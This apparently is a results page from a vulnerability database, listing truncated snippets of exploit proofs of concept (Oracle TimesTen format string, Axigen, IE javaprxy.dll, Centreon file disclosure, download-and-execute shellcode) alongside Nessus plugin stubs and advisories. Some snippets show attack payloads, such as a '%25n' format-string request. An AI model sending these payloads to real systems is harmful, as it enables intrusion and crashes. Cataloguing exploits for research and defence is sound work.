582 matches found
Oracle Times Ten Format String
!/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" print "Sendin...
Oracle TimesTen - Remote Format String (PoC)
!/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" print "Sendin...
Oracle TimesTen - Remote Format String (PoC)
Oracle TimesTen - Remote Format String PoC !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET...
Oracle TimesTen Remote Format String PoC
Exploit for multiple platform in category dos / poc ======================================== Oracle TimesTen Remote Format String PoC ======================================== !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """...
FreeBSD : p5-File-Path -- rmtree allows creation of setuid files (13b0c8c8-bee0-11dd-a708-001fc66e7203)
Jan Lieskovsky reports : perl-File-Path rmtree race condition CVE-2005-0448 was assigned to address this This vulnerability was fixed in 5.8.4-7 but re-introduced in 5.8.8-1. It's also present in File::Path 2.xx, up to and including 2.07 which has only a partial fix. %NASLMINLEVEL 70300 C Tenable...
Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)
Windows/x86 - Download File http://skypher.com/dll + LoadLibrary + Null-Free Shellcode 164 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metas... ; Copyright c 2009-2010, Berend-Jan "SkyLined" Wever ; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/ ; All rights...
Solaris 9 (sparc) : 112915-06
SunOS 5.9: snoop Patch. Date this patch was last updated by Sun : Jan/06/09 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text in this plugin was extracted from the Oracle SunOS Patch Updates. include'deprecatednasllevel.inc'; include'compat.inc'; if description...
MS Internet Explorer (javaprxy.dll) COM Object Remote Exploit
No description provided by source. !-- update frsirt updated the comments to reflect skylined's code + gpl. /str0ke Perl code is commented so people can test the vuln on their IE /str0ke !/usr/bin/perl Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched- Proof of Concept by t...
Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure
!/usr/bin/python Date : 20/01/2008 Author : Julien CAYSSOL import sys, urllib2,re useragent = 'Mozilla/6.0 compatible; MSIE 6.0; Windows NT' headers = 'User-Agent' : useragent , 'Accept-Charset' : 'ISO-8859-15' if name == "main": if lensys.argv==2: host = sys.argv1 print " + Host : " + host url =...
Solaris 8 (sparc) : 117586-22
IS 6.1: Sun ONE Identity Server. Date this patch was last updated by Sun : Jan/17/08 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text in this plugin was extracted from the Oracle SunOS Patch Updates. include'deprecatednasllevel.inc'; include'compat.inc'; if description...
Solaris 9 (sparc) : 137038-01
SunOS 5.9: ImageMagick patch. Date this patch was last updated by Sun : Jan/24/08 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text in this plugin was extracted from the Oracle SunOS Patch Updates. include'deprecatednasllevel.inc'; include'compat.inc'; if description...
AXIGEN 5.0.x AXIMilter Format String Exploit
/ Axigen 5.0.x AXIMilter Format String Exploit by hempel JAN 16 2008 thx to mu-b digit-labs.org / include stdio.h include netinet/in.h include sys/socket.h include sys/types.h include sys/uio.h include unistd.h include string.h char buf = "FROM:rnEHLO:rnCNIP:rnCNPO:rnCNHO: " / offsets /...
Security | Oracle Critical Patch Update - January 2008
A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only th...
Cisco VPN Client - IPSec Driver Local kernel system pool Corruption (PoC)
/ cpndrv-dos.c Copyright c 2008 by Cisco Systems VPN Client IPSec Driver local kernel system pool corruption POC by mu-b - Sat 11 Jan 2008 - Tested on: CVPNDRVA.sys 5.0.02.0090 specifying an input buffer size less-than 8+31-bytes results in the local kernel non-paged pool METHODBUFFERED being...
USN-566-1: OpenSSH vulnerability
Jan Pechanec discovered that ssh would forward trusted X11 cookies when untrusted cookie generation failed. This could lead to unintended privileges being forwarded to a remote host...
Buffer-overflow and format string in White_Dune 0.29beta791
Luigi Auriemma Application: WhiteDune http://vrml.cip.ica.uni-stuttgart.de/dune/ Versions: = 0.29beta791 Platforms: Unix/Linux/MacOSX and Windows Bugs: A buffer-overflow in Scene::errorf B format string in ImportFile Exploitation: local Date: 02 Jan 2008 Author: Luigi Auriemma e-mail:...
HP-UX Security Patch : PHSS_17419
CDE Runtime JAN 99 Cumulative Patch %NASLMINLEVEL 70300 C Tenable Network Security, Inc. if !definedfunc"bnrandom" exit0; include'deprecatednasllevel.inc'; include'compat.inc'; if description scriptid26576; scriptversion"1.8"; scriptsetattributeattribute:"pluginmodificationdate",...
movieplay-overflow.txt
!/usr/bin/env ruby MoviePlay 4.76 .lst file Local buffer over-flow. Credit to n00b for writing poc code..Pmsl Tested on :Win xp sp2 eng. Vendor web site: Netfarer.com MoviePlay 4.76 Buffer-over flow reported : Jan 02 2007 12:00AM Credit goes to Parvez Anwar for finding the bug. MoviePlay is prone...
Solaris 5.6 (x86) : 111963-04
Solstice Backup 6.1x86: Product Patch. Date this patch was last updated by Sun : Jan/06/04 %NASLMINLEVEL 999999 @DEPRECATED@ This script has been deprecated as the associated patch is not currently a recommended security fix. Disabled on 2011/09/17. C Tenable Network Security, Inc. if !...
Solaris 9 (x86) : 124831-01
X11 6.6.1x86: xdm patch. Date this patch was last updated by Sun : Jan/18/07 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text in this plugin was extracted from the Oracle SunOS Patch Updates. include'deprecatednasllevel.inc'; include'compat.inc'; if description...